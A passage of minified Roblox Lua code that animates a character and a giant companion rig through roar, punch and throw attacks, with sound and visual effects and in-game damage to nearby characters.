Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,-0.5*fG)*ANGLES(RAD(140),RAD(0),RAD(-25))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,-0.5*fG)*ANGLES(RAD(140),RAD(0),RAD(25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(25),RAD(80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(25),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end;CreateSound(e3,Head2,10,1,false)for T=0,4,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(35),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-35),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-45),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-45),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end;mB=false;mF=false end;function Roar(nM)mB=true;mF=true;local mR=false;coroutine.resume(coroutine.create(function()repeat Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,8,0),0.1)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.15/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(35),RAD(0),RAD(0)),0.15/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.45,0.65,0)*ANGLES(RAD(170),RAD(0),RAD(-22))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.45,0.65,0)*ANGLES(RAD(170),RAD(0),RAD(22))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),0.15/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),0.15/Animation_Speed)until mR==true end))for T=0,1,0.1/Animation_Speed do Swait()RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.15*fG,0.5*fG,-0.5*fG)*ANGLES(RAD(140),RAD(0),RAD(-45))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.15*fG,0.5*fG,-0.5*fG)*ANGLES(RAD(140),RAD(0),RAD(45))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(25),RAD(80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(25),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end;CreateSound(e3,Effects,4,1,false)if nM then for mR=1,#nM do if nM[mR]:FindFirstChildOfClass("Torso")then local nl=GetRoot(nM[mR],true)if nl then ApplyDamage(nM[mR]:FindFirstChildOfClass("Torso"),MRANDOM(0,50))local bv=Instance.new("BodyVelocity")bv.maxForce=Vector3.new(1000000000,1000000000,1000000000)bv.velocity=CF(RootPart.Position,nl.Position).lookVector*150;bv.Parent=nl;Debris:AddItem(bv,0.05)end end end end;for T=0,6,0.1/Animation_Speed do Swait()local nN,nO=Raycast(RootPart2.Position,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,25,Character)if nN then end;WACKYEFFECT({EffectType="Wave",Size=VT(20,1,20),Size2=VT(25+MRANDOM(0,8),7,25+MRANDOM(0,8)),Transparency=0.9,Transparency2=1,CFrame=CF(nO)*ANGLES(RAD(0),RAD(MRANDOM(0,360)),RAD(0)),MoveToPos=nil,RotationX=0,RotationY=5,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-35),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-35),RAD(MRANDOM(-3,3)),RAD(MRANDOM(-3,3))),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-45),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-45),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end;mR=true;if nM then CreateSound(1535995263,Head,10,1,false)for T=0,2.2,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(-5+2*SIN(mG/12)),RAD(15),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.3*fG,-0.6*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.15/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(15),RAD(25),RAD(0)),0.15/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(170),RAD(0),RAD(5))*mx,0.15/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(170),RAD(0),RAD(-5))*my,0.15/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),0.15/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),0.15/Animation_Speed)end end;mB=false;mF=false end;function Punch()mB=true;mF=false;local nP={}l=12;for T=0,1,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(-45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(90),RAD(0),RAD(-45))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(-25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;CreateSound(588693579,RightArm2,6,MRANDOM(8,12)/10,false)for T=0,0.3,0.1/Animation_Speed do Swait()WACKYEFFECT({EffectType="Box",Size=RightArm2.Size,Size2=RightArm2.Size,Transparency=RightArm2.Transparency,Transparency2=1,CFrame=RightArm2.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.4)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(135),RAD(0),RAD(45))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;for nD,nE in pairs(workspace:GetDescendants())do if nE.ClassName=="Model"and nE~=Character then do local nF=nE:FindFirstChildOfClass("Torso")if nF then do local nG=nE:FindFirstChild("Torso")or nE:FindFirstChild("UpperTorso")if nG and(nG.Position-RightArm2.CFrame*CF(0,-2,0).p).Magnitude<=15 then table.insert(nP,nE)coroutine.resume(coroutine.create(function()CreateSound(260430117,nG,3,MRANDOM(8,12)/10,false)nG.Anchored=true;local nJ=nG.CFrame;for T=1,35 do Swait()ApplyDamage(nF,MRANDOM(0,0))nG.CFrame=nJ*CF(MRANDOM(-2,2)/10,MRANDOM(-2,2)/10,MRANDOM(-2,2)/10)end;nG.Anchored=false end))end end end end end end;for T=0,0.2,0.1/Animation_Speed do Swait()WACKYEFFECT({EffectType="Box",Size=RightArm2.Size,Size2=RightArm2.Size,Transparency=RightArm2.Transparency,Transparency2=1,CFrame=RightArm2.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.5)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(135),RAD(0),RAD(-70))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;if#nP>0 then for T=0,0.5,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,3,-5),0.5)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(45),RAD(0),RAD(45)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(5),RAD(0),RAD(-45)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.25*fG,0.5*fG,-0.25*fG)*ANGLES(RAD(135),RAD(0),RAD(-70))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(50-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(25)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(-25)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.35,0.5,0)*ANGLES(RAD(90),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-8),RAD(0),RAD(0)),1/Animation_Speed)end;Roar(nP)end;l=16;mB=false;mF=false end;function Throw()brug=false;bruhmom=false;pewhandle.Anchored=true;mB=true;mF=false;local nt={}for T=0,1,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,1,2),0.2)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(90),RAD(0),RAD(-25))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(90),RAD(0),RAD(25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(12))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)end;local fS=RootPart2.CFrame*CF(0,50,0)Humanoid.PlatformStand=true;mQ=false;for T=0,1,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,CF(fS.p,VT(Mouse.Hit.p.X,RootPart2.Position.Y,Mouse.Hit.p.Z)),0.2)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(90),RAD(0),RAD(-25))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(90),RAD(0),RAD(25))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5*fG)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootPart.CFrame=RootPart2.CFrame*CF(0,-1,-2)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(12))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-12))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)end;local nQ=CreateWeldOrSnapOrMotor("Weld",RightArm2,RightArm2,Torso,CF(0,-2,0)*ANGLES(RAD(-90),RAD(0),RAD(0)),CF(0,0,0))for T=0,0.4,0.1/Animation_Speed do Swait()RootPart2.CFrame=Clerp(RootPart2.CFrame,CF(fS.p,VT(Mouse.Hit.p.X,RootPart2.Position.Y,Mouse.Hit.p.Z)),0.2)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(140),RAD(0),RAD(0))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(0))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,-0.3)*ANGLES(RAD(90),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.35,-0.3)*ANGLES(RAD(80),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.4,-0.5)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-0.4,-0.5)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-1),RAD(0),RAD(0)),1/Animation_Speed)end;local e9=false;nQ:remove()RootPart.CFrame=CF(RightArm2.CFrame*CF(0,-3,0).p,Mouse.Hit.p)CreateSound(588693579,RightArm2,6,MRANDOM(8,12)/10,false)for T=0,0.4,0.1/Animation_Speed do Swait()WACKYEFFECT({EffectType="Box",Size=RightArm2.Size,Size2=RightArm2.Size,Transparency=RightArm2.Transparency,Transparency2=1,CFrame=RightArm2.CFrame,MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})RootPart2.CFrame=Clerp(RootPart2.CFrame,CF(fS.p,VT(Mouse.Hit.p.X,RootPart2.Position.Y,Mouse.Hit.p.Z)),0.2)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(140),RAD(0),RAD(0))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(0))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.5*fG,-0.5)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(